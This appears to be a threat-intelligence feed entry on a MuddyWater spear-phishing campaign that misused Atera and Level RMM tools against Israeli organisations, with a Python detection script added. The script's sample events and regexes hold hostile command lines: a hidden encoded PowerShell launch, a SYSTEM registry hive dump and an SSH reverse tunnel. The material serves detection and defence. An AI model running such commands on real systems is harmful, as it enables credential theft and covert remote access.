Threats Feed | MuddyWater | Last Updated: 24/01/2025 | Author: Certfa Radar | Publish Date: 20/11/2024

MuddyWater Campaign Targets Israeli Organizations with RMM Tool Misuse

  • Actor Motivations: Espionage, Exfiltration
  • Attack Vectors: Spear Phishing
  • Attack Complexity: Medium
  • Threat Risk: Low Impact/High Probability

Threat Overview

Sophos MDR has identified a targeted phishing campaign against organisations in Israel, attributed with moderate confidence to the Iranian-linked threat actor group MuddyWater (TA450). The campaign used phishing emails that tricked users into downloading a ZIP file containing an installer for the legitimate remote management tool Atera. After gaining access, the threat actors misused Atera, through a trial account believed to be compromised, to install the Atera Agent and run a PowerShell script for credential dumping and for creating a backup of the SYSTEM registry hive; Sophos behavioural rules detected and blocked this activity. Post-compromise activity included domain enumeration commands, establishing an SSH tunnel to a remote IP address, and downloading another remote management tool, Level RMM, via an obfuscated PowerShell command. The campaign's tactics align with previously reported TA450 activity and highlight the technique of abusing legitimate software for malicious purposes.
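The three post-access behaviours described above (an RMM agent spawning obfuscated PowerShell, a backup of a credential-bearing registry hive, and an SSH port-forward to a remote host) can be turned into simple process-creation detections. The following is an added example written for this page, not code from Sophos or Certfa; the event field names, the RMM process names in RMM_PARENTS, and the sample events are constructed assumptions to adjust for your own telemetry.

```python
import re
from dataclasses import dataclass

# Assumed binary names for the RMM agents named in the report; tune per environment.
RMM_PARENTS = {"ateraagent.exe", "level.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Markers of encoded or hidden PowerShell launches (the obfuscated command in the report).
ENCODED_PS = re.compile(r"(-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}|frombase64string|-w(indowstyle)?\s+hidden)", re.I)
# reg.exe backup of SYSTEM/SAM/SECURITY hives, a precursor to offline credential dumping.
HIVE_SAVE = re.compile(r"\breg(\.exe)?\s+(save|export)\s+(hklm|hkey_local_machine)\\(system|sam|security)\b", re.I)
# ssh with a port-forwarding flag (-L/-R/-D, or -N for a forward-only session).
SSH_TUNNEL = re.compile(r"\bssh(\.exe)?\b.*\s-[LRND]\b", re.I)

@dataclass
class Event:          # constructed process-creation record (e.g. from EDR or Sysmon EID 1)
    host: str
    parent_image: str
    image: str
    command_line: str

def classify(ev: Event) -> list[str]:
    """Return the names of every rule the event matches (empty list if benign)."""
    hits = []
    parent = ev.parent_image.rsplit("\\", 1)[-1].lower()
    image = ev.image.rsplit("\\", 1)[-1].lower()
    if parent in RMM_PARENTS and image in POWERSHELL and ENCODED_PS.search(ev.command_line):
        hits.append("rmm_spawned_obfuscated_powershell")
    if HIVE_SAVE.search(ev.command_line):
        hits.append("registry_hive_backup")
    if image in {"ssh.exe", "ssh"} and SSH_TUNNEL.search(ev.command_line):
        hits.append("ssh_port_forward")
    return hits

def scan(events):
    """Flatten (host, rule) pairs across a batch of events."""
    return [(ev.host, rule) for ev in events for rule in classify(ev)]

SAMPLE_EVENTS = [  # constructed for illustration; 203.0.113.10 is a documentation address
    Event("ws01", r"C:\Program Files\AteraAgent\AteraAgent.exe", r"C:\Windows\System32\powershell.exe",
          "powershell.exe -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    Event("ws01", r"C:\Windows\System32\powershell.exe", r"C:\Windows\System32\reg.exe",
          r"reg save HKLM\SYSTEM C:\Users\Public\sys.hiv"),
    Event("ws01", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\OpenSSH\ssh.exe",
          "ssh.exe -N -R 2222:127.0.0.1:3389 user@203.0.113.10"),
    Event("ws02", r"C:\Windows\explorer.exe", r"C:\Windows\System32\powershell.exe",
          "powershell.exe Get-ChildItem C:\\Temp"),  # benign, should not match
]

if __name__ == "__main__":
    for host, rule in scan(SAMPLE_EVENTS):
        print(host, rule)
```

Each rule on its own is noisy in some environments (administrators do save hives and use SSH forwarding); the report's sequence, RMM install followed by hive backup and a tunnel on the same host, is what should raise the alert priority.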

Detected Targets

Type   | Description | Confidence
Region | Israel      | Verified

Extracted IOCs

  • 51[.]16.209.105

Tip: 1 related IOC (1 IP, 0 domains, 0 URLs, 0 emails, 0 file hashes) has been found for this threat.